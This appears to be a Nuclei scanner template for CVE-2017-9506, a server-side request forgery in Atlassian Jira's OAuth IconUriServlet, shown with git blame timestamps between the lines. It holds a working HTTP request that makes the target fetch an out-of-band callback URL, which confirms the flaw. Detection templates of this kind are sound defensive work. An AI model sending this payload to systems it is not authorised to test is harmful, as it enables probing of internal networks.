nuclei-templates/cves/2017/CVE-2017-9506.yaml

31 lines
1.1 KiB
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2017-9506
2020-04-04 18:19:48 +00:00
info:
name: Jira IconURIServlet SSRF
2021-04-06 06:46:11 +00:00
author: pdteam
severity: medium
2020-08-25 21:51:04 +00:00
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
reference:
2021-04-18 13:00:27 +00:00
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
- https://ecosystem.atlassian.net/browse/OAUTH-344
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
2021-05-09 15:11:52 +00:00
tags: cve,cve2017,atlassian,jira,ssrf,oob
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-9506
cwe-id: CWE-918
2020-04-04 18:19:48 +00:00
requests:
2021-04-18 16:36:07 +00:00
- raw:
- |
2021-06-09 07:41:39 +00:00
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
2021-04-18 16:36:07 +00:00
Host: {{Hostname}}
Origin: {{BaseURL}}
2020-04-04 18:19:48 +00:00
matchers:
- type: word
2021-04-18 16:36:07 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
2020-04-04 18:19:48 +00:00
words:
- "http"